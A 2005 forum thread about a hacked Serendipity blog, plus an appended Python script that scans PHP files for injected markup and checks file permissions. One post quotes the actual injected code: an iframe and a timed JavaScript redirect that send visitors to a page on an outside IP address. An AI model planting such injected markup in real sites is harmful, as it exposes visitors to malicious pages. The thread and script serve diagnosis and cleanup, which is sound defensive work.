Blog hacked
Posted: Fri Apr 01, 2005 12:16 am
by rolli
Hi,
When I had a look at my CoWriters Testblog, I noticed that it was hacked. I don't know the reason why.
If you want to have a look at my hacked blog:
http://www.bibi-rolli.de/blog101/
Can anybody help me? The database seems to be clear ...
Best wishes,
Rolli
Posted: Fri Apr 01, 2005 3:48 am
by tadpole
Looks like they just inserted a few lines at the beginning of the index.php file. Delete them. An iframe and a script element, it looks like.
As far as why, it probably wasn't serendipity that they got in through.
Could Be Anything...
Posted: Fri Apr 01, 2005 9:37 am
by ionic
You are running quite a lot of other applications...
Like a TRIAL version of Invision Power Board...
Of course you can drop a mail to phpaudit@suspekt.org and get an audit of your server for a fee

Posted: Fri Apr 01, 2005 9:42 am
by Rolli
In the morning I had a further look and you are right, this is the code:
<IFRAME style="WIDTH: 1125px; HEIGHT: 1000px" marginWidth=0 marginHeight=0 src="http://217.13.198.251/avs/newdir1/stoorm.html" frameBorder=0 width=150 scrolling=no height=185> </IFRAME>
<script LANGUAGE="JavaScript">
setTimeout("window.location='http://217.13.198.251/avs/newdir1/stoorm.html'",15000);
// wait delay in ms
</script>
<?php # $Id: index.php,v 1.77 2005/03/02 09:58:33 garvinhicking Exp $
But I think it must be a problem of the blog; my second test blog with another (different) user is also hacked in the same way. The rest of my server is pretty well ....
Posted: Fri Apr 01, 2005 10:20 am
by rolli
UPDATE
After deleting the iframes at the beginning and the end of the index.php the blog works OK. I have checked my server twice for other intrusion and hacking, but everything is OK ... the hacker just hacked my two testboards and nothing else ....
Posted: Fri Apr 01, 2005 10:52 am
by garvinhicking
The thing is this: The attacker cannot have inserted the code if he didn't have file access to index.php
Check the permissions of index.php - if the file is only writable by your FTP user and not nobody (aka webserver) then it means your FTP account got hacked.
There would be no way that Serendipity could overwrite the index.php from only within the application.
Regards,
Garvin
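The check discussed in this thread, as an added example that is not part of the original posts or of Serendipity: a Python sketch that walks a web root, flags `.php` files with an `<iframe>` or `<script>` element before the first `<?php` or after the last `?>`, and reports who may write each file. The function names, the sample files and the `placeholder.invalid` URL are constructed for illustration; templates that legitimately start with HTML will also be flagged and need a manual look.

```python
import os, re, stat, tempfile

# Markup of the kind quoted in the thread: an <iframe> or <script> element
INJECTED = re.compile(rb"<\s*(iframe|script)\b", re.IGNORECASE)

def audit_php_file(path):
    """Report markup outside the PHP tags and the write bits of one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    start = data.find(b"<?php")
    end = data.rfind(b"?>")
    head = data[:start] if start != -1 else b""
    # Only text after a closing tag that follows the opening tag counts as tail
    tail = data[end + 2:] if end > start else b""
    st = os.stat(path)
    return {
        "path": path,
        "markup_before_php": bool(INJECTED.search(head)),
        "markup_after_php": bool(INJECTED.search(tail)),
        "group_writable": bool(st.st_mode & stat.S_IWGRP),
        "world_writable": bool(st.st_mode & stat.S_IWOTH),
        "owner_uid": st.st_uid,  # compare with the FTP and web server users
    }

def audit_tree(root):
    """Audit every .php file below root."""
    return [audit_php_file(os.path.join(d, n))
            for d, _dirs, names in os.walk(root)
            for n in names if n.endswith(".php")]

def build_sample(root):
    """Constructed sample: one clean file, one with markup added at both ends."""
    clean = os.path.join(root, "clean.php")
    bad = os.path.join(root, "index.php")
    with open(clean, "wb") as fh:
        fh.write(b"<?php # constructed clean file\necho 'ok';\n?>\n")
    with open(bad, "wb") as fh:
        fh.write(b'<IFRAME src="http://placeholder.invalid/x.html"></IFRAME>\n'
                 b"<?php # constructed sample\necho 'blog';\n?>\n"
                 b'<iframe src="http://placeholder.invalid/x.html"></iframe>\n')
    os.chmod(clean, 0o644)   # writable by the owner only
    os.chmod(bad, 0o666)     # writable by everyone, including the web server
    return clean, bad

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for finding in audit_tree(tmp):
            print(finding)
```

A file that is flagged but writable only by its owner points at that owner's account (for example FTP) rather than at the web application, which is the distinction drawn in the post above.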